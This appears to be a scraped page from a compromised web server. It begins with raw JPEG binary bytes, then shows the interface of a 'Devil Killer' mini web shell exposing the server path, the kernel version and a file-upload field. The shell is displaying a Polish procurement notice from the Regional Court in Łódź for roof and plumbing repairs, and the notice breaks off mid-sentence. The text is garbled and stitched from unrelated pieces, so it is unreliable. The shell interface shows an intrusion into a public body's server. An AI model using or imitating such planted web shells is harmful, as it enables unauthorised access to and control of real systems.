JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210517/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210517/0005629901-N-2021.html

<header hidden><table style="border-bottom: 1px solid black; width:100%"><tr><td>Ogłoszenie nr 2021/BZP 00056299 z dnia 2021-05-17</td></tr></table></header><main><!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Remont pokrycia dachu i naprawa ścian zewn. oraz wymiana instalacji wodnej i instalacji elektr. zasilania pomp w budynku Archiwum Zakładowego Sądu Okręgowego w Łodzi, przy ul. Wydawniczej 10 . </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Sąd Okręgowy w Łodzi</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">NIP 7251042790</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Plac Dąbrowskiego 5</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Łódź</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">90-921</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">łódzkie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL711 - Miasto Łódź</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">miroslaw.godziszewski@lodz.so.gov.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.lodz.so.gov.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inny zamawiający</span> </h3> <p class="mb-0"> sąd powszechny </p> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> wymiar sprawiedliwości </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Remont pokrycia dachu i naprawa ścian zewn. oraz wymiana instalacji wodnej i instalacji elektr. zasilania pomp w budynku Archiwum Zakładowego Sądu Okręgowego w Łodzi, przy ul. Wydawniczej 10 . </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-25096bd8-b6f1-11eb-911f-9ad5f74c2a25</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00056299</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-05-17</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00019946/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.1 Wymiana instalacji wodciągowej wody zimnej, ciepłej, p-poż i instalacji elektrycznej zasilania pomp w budynku Archiwum Zakładowego SO w Łodzi ul.Wydawnicza 10</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.ms.gov.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://ezamowienia.ms.gov.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Szczegółowe informacje znajdują się w SWZ, w Dziale X X.	Informacje o środkach komunikacji elektronicznej, przy użyciu których Zamawiający będzie komunikował się z wykonawcami, oraz informacje o wymaganiach technicznych i organizacyjnych sporządzania, wysyłania i odbierania korespondencji elektronicznej</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP.XXVII. 3310-1/2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> – Remont pokrycia dachu i naprawa ścian zewnętrznych w budynku Archiwum Zakładowego Sądu Okręgowego w Łodzi, przy ul. Wydawniczej 10 w Łodzi.W zakres zamówienia dla Części I wchodzą:a.	remont ścian zewnętrznych (odbicie tynków, wzmocnienie podłoża, uzupełnienie ubytków, malowanie elewacji);b.	remont gzymsów;c.	demontaż nieużytkowanych kominów wentylacji mechanicznej wraz z uzupełnieniem pokrycia dachu z blachy;d.	demontaż instalacji odgromowej i jej ponowny montaż po zakończeniu remontu dachu;e.	remont pokrycia dachowego (rozbiórka istniejącej papy i docieplenia, przygotowanie podłoża, montaż wełny mineralnej do podłoża, wykonanie nowego poszycia z papy);f.	remont kominów;g.	docieplenie ścian attykowych;h.	remont nadbudowy nad klatką schodową (remont pokrycia dachowego, docieplenie ścian zewnętrznych).Szczegółowy zakres robót określa dokumentacja projektowa. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45210000-2 - Roboty budowlane w zakresie budynków</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45111100-9 - Roboty w zakresie burzenia</p> <p class="mb-0">45111220-6 - Roboty w zakresie usuwania gruzu</p> <p class="mb-0">45111300-1 - Roboty rozbiórkowe</p> <p class="mb-0">45261000-4 - Wykonywanie pokryć i konstrukcji dachowych oraz podobne roboty</p> <p class="mb-0">45320000-6 - Roboty izolacyjne</p> <p class="mb-0">45410000-4 - Tynkowanie</p> <p class="mb-0">45430000-0 - Pokrywanie podłóg i ścian</p> <p class="mb-0">45440000-3 - Roboty malarskie i szklarskie</p> <p class="mb-0">45442110-1 - Malowanie budynków</p> <p class="mb-0">45450000-6 - Roboty budowlane wykończeniowe, pozostałe</p> <p class="mb-0">45453000-7 - Roboty remontowe i renowacyjne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">3 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Przy wyborze najkorzystniejszej oferty dla każdej z Części z osobna, Zamawiający będzie kierował się następującymi kryteriami: C – cena oferty – znaczenie 60%, G – gwarancja – znaczenie 40% 2.	Zamawiający wybierze spośród ofert niepodlegających odrzuceniu ofertę, która otrzyma najwyższą punktację.3.	Punktacja zostanie obliczona na podstawie wzoru:P = C x 0,6 + G x 0,4 Cena (maksymalna ocena) - 60 pkt Sposób wyliczenia punktów oferty: C = (C min / C b x 100) x 0,6	gdzie:	C	- ilość punktów oferty badanej; C min	- cena brutto oferty o najniższej cenie; C b - cena brutto oferty badanej.4.	Do obliczenia punktacji za kryterium CENA zostanie zastosowane następujące przeliczenie: C x 0,6 5.	Do obliczenia punktacji za kryterium GWARANCJA zostanie zastosowane następujące przeliczenie: G x 0,4 gdzie:	G - ilość punktów oferty badanej (punktacja zgodnie z poniższą tabelą);(maksymalna ocena) - 40 pktPoniższe wartości KRYTERIUM GWARANCJI są jednakowe i dotyczą każdej z Części osobno, zgodnie z Formularzem ofertowymKRYTERIUM - GWARANCJA24 miesiące	36 miesięcy	48 miesięcy	60 miesięcy25 pkt	50 pkt	75 pkt	100 pkt1)	ocena ofert zostanie przeprowadzona wyłącznie w oparciu o przedstawione powyżej kryteria;2)	punkty będą liczone z dokładnością do dwóch (2) miejsc po przecinku, stosując powszechne zasady zaokrąglania.wg SWZ</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">termin gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.8.) Sposób oceny ofert: </h3> 1.	Przy wyborze najkorzystniejszej oferty dla każdej z Części z osobna, Zamawiający będzie kierował się następującymi kryteriami: C – cena oferty – znaczenie 60%, G – gwarancja – znaczenie 40% 2.	Zamawiający wybierze spośród ofert niepodlegających odrzuceniu ofertę, która otrzyma najwyższą punktację.3.	Punktacja zostanie obliczona na podstawie wzoru:P = C x 0,6 + G x 0,4 Cena (maksymalna ocena) - 60 pkt Sposób wyliczenia punktów oferty: C = (C min / C b x 100) x 0,6	gdzie:	C	- ilość punktów oferty badanej; C min	- cena brutto oferty o najniższej cenie; C b - cena brutto oferty badanej.4.	Do obliczenia punktacji za kryterium CENA zostanie zastosowane następujące przeliczenie: C x 0,6 5.	Do obliczenia punktacji za kryterium GWARANCJA zostanie zastosowane następujące przeliczenie: G x 0,4 gdzie:	G - ilość punktów oferty badanej (punktacja zgodnie z poniższą tabelą);(maksymalna ocena) - 40 pktPoniższe wartości KRYTERIUM GWARANCJI są jednakowe i dotyczą każdej z Części osobno, zgodnie z Formularzem ofertowymKRYTERIUM - GWARANCJA24 miesiące	36 miesięcy	48 miesięcy	60 miesięcy25 pkt	50 pkt	75 pkt	100 pkt1)	ocena ofert zostanie przeprowadzona wyłącznie w oparciu o przedstawione powyżej kryteria;2)	punkty będą liczone z dokładnością do dwóch (2) miejsc po przecinku, stosując powszechne zasady zaokrąglania.wg SWZ <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Wymiana instalacji elektrycznej zasilania pomp w budynku Archiwum Zakładowego Sądu Okręgowego w Łodzi, przy ul. Wydawniczej 10 w Łodzi.W zakres zamówienia dla Części II wchodzą:Zgodnie z załączonym projektem technicznym wykonanie wymiany instalacji wodociągowej wody zimnej, ciepłej i p.poż. oraz wewnętrznej linii zasilającej tablicę rozdzielczą hydroforni i instalacji zasilania zaworu elektro-magnetycznego w budynku Archiwum Zakładowego Sądu Okręgowego w Łodzi przy ul. Wydawniczej 10 w Łodzi. Obecnie istniejąca instalacja wodociągowa wykonana jest z rur stalowych ocynkowanych. Przewody instalacji wody zimnej i ciepłej rozprowadzone są pod stropem i po wierzchu ścian. Instalacja wewnętrzna wody zimnej, ciepłej biegnąca w piwnicy ze względu na znaczny stopień zużycia i nowe rozwiązania projektowe ulega wymianie – piony pozostają bez zmian.Cała instalacja hydrantowa – piony i poziomy ulegają demontażowi. W obiekcie znajduje się 15 hydrantów z czego 14 będzie do wymiany, 1 pozostaje bez zmian.Linia elektryczna zasilająca obecnie tablicę rozdzielczą hydroforni wyprowadzona jest z rozdzielnicy, która w momencie wyłączenia obiektu z powodu pożaru pozbawiona jest napięcia a tym samym wyłączony jest hydrofor, który zasila hydranty p-poż. w budynku.Zgodnie z wytycznymi zamawiającego należy wykonać wg projektu nową wewnętrzną linię zasilającą hydrofor wyprowadzoną będzie z przed wyłącznika głównego rozdzielnicy RG. Szczegółowy zakres robót określa dokumentacja projektowa. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45310000-3 - Roboty instalacyjne elektryczne</p> <p class="mb-0">45311000-0 - Roboty w zakresie okablowania oraz instalacji elektrycznych</p> <p class="mb-0">45321000-3 - Izolacja cieplna</p> <p class="mb-0">45330000-9 - Roboty instalacyjne wodno-kanalizacyjne i sanitarne</p> <p class="mb-0">45453000-7 - Roboty remontowe i renowacyjne</p> <p class="mb-0">50000000-5 - Usługi naprawcze i konserwacyjne</p> <p class="mb-0">50700000-2 - Usługi w zakresie napraw i konserwacji instalacji budynkowych</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">3 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Przy wyborze najkorzystniejszej oferty dla każdej z Części z osobna, Zamawiający będzie kierował się następującymi kryteriami: C – cena oferty – znaczenie 60%, G – gwarancja – znaczenie 40% 2.	Zamawiający wybierze spośród ofert niepodlegających odrzuceniu ofertę, która otrzyma najwyższą punktację.3.	Punktacja zostanie obliczona na podstawie wzoru:P = C x 0,6 + G x 0,4 Cena (maksymalna ocena) - 60 pkt Sposób wyliczenia punktów oferty: C = (C min / C b x 100) x 0,6	gdzie:	C	- ilość punktów oferty badanej; C min	- cena brutto oferty o najniższej cenie; C b - cena brutto oferty badanej.4.	Do obliczenia punktacji za kryterium CENA zostanie zastosowane następujące przeliczenie: C x 0,6 5.	Do obliczenia punktacji za kryterium GWARANCJA zostanie zastosowane następujące przeliczenie: G x 0,4 gdzie:	G - ilość punktów oferty badanej (punktacja zgodnie z poniższą tabelą);(maksymalna ocena) - 40 pktPoniższe wartości KRYTERIUM GWARANCJI są jednakowe i dotyczą każdej z Części osobno, zgodnie z Formularzem ofertowymKRYTERIUM - GWARANCJA24 miesiące	36 miesięcy	48 miesięcy	60 miesięcy25 pkt	50 pkt	75 pkt	100 pkt1)	ocena ofert zostanie przeprowadzona wyłącznie w oparciu o przedstawione powyżej kryteria;2)	punkty będą liczone z dokładnością do dwóch (2) miejsc po przecinku, stosując powszechne zasady zaokrąglania.wg SWZ</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">termin gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.8.) Sposób oceny ofert: </h3> 1.	Przy wyborze najkorzystniejszej oferty dla każdej z Części z osobna, Zamawiający będzie kierował się następującymi kryteriami: C – cena oferty – znaczenie 60%, G – gwarancja – znaczenie 40% 2.	Zamawiający wybierze spośród ofert niepodlegających odrzuceniu ofertę, która otrzyma najwyższą punktację.3.	Punktacja zostanie obliczona na podstawie wzoru:P = C x 0,6 + G x 0,4 Cena (maksymalna ocena) - 60 pkt Sposób wyliczenia punktów oferty: C = (C min / C b x 100) x 0,6	gdzie:	C	- ilość punktów oferty badanej; C min	- cena brutto oferty o najniższej cenie; C b - cena brutto oferty badanej.4.	Do obliczenia punktacji za kryterium CENA zostanie zastosowane następujące przeliczenie: C x 0,6 5.	Do obliczenia punktacji za kryterium GWARANCJA zostanie zastosowane następujące przeliczenie: G x 0,4 gdzie:	G - ilość punktów oferty badanej (punktacja zgodnie z poniższą tabelą);(maksymalna ocena) - 40 pktPoniższe wartości KRYTERIUM GWARANCJI są jednakowe i dotyczą każdej z Części osobno, zgodnie z Formularzem ofertowymKRYTERIUM - GWARANCJA24 miesiące	36 miesięcy	48 miesięcy	60 miesięcy25 pkt	50 pkt	75 pkt	100 pkt1)	ocena ofert zostanie przeprowadzona wyłącznie w oparciu o przedstawione powyżej kryteria;2)	punkty będą liczone z dokładnością do dwóch (2) miejsc po przecinku, stosując powszechne zasady zaokrąglania.wg SWZ <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki udziału w postępowaniu dotyczące: 1)	sytuacji ekonomicznej lub finansowej;Zamawiający wymaga, posiadania przez wykonawcę dokumentów potwierdzających, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia ze wskazaniem sumy gwarancyjnej tego ubezpieczenia, na kwotę nie mniejszą niż:dla Części 1 – 500 000 zł.dla Części 2 – 100 000 zł. W przypadku składania oferty na więcej niż jedną z Części zamówienia, wykonawca spełni warunek udziału w postępowaniu dot. sytuacji ekonomicznej i finansowej, jeśli przedstawi zamawiającemu dokument potwierdzający ubezpieczenie od odpowiedzialności cywilnej w wysokości o najwyższej wartości.2)	zdolności technicznej lub zawodowej: Warunek ten zostanie uznany za spełniony, jeżeli wykonawca przedstawi wykaz robót budowlanych – załącznik 5 do SWZ, wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, co najmniej: – po jednej robocie budowlanej polegającej na: dla Części I – budowie, przebudowie lub remoncie płaskiego dachu o pow. min. 500 m2 w budynku mieszkalnym, zamieszkania zbiorowego, użyteczności publicznej lub innym oraz pracach tynkarskich, o łącznej wartości robót nie mniejszej niż 100 000 zł. brutto; dla Części II – wykonaniu instalacji wodociągowej w budynku mieszkalnym, zamieszkania zbiorowego, użyteczności publicznej lub innym, o łącznej wartości robót nie mniejszej niż 50 000 zł. brutto; wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały wykonane, z załączeniem dowodów określających, czy te roboty budowlane zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest wstanie uzyskać tych dokumentów – inne odpowiednie dokumenty.a)	dysponuje osobami zdolnymi do wykonania zamówienia oraz skieruje je do realizacji Części I zamówienia, tj.: Zamawiający uzna, że wykonawca spełnia powyższy warunek udziału w postępowaniu, jeżeli wykaże, że dysponuje osobą z PEŁNYMI UPRAWNIENIAMI Z BRANŻY KONSTRUKCYJNO – BUDOWLANEJ, zdolną do wykonania zamówienia oraz skieruje ją do realizacji zamówienia. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">3.	Zamawiający przed wyborem najkorzystniejszej oferty, wezwie za pomocą Systemu SmartPzp wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni, aktualnych na dzień złożenia następujących podmiotowych środków dowodowych: 1)	Odpisu lub informacji z Krajowego Rejestru Sądowego lub z 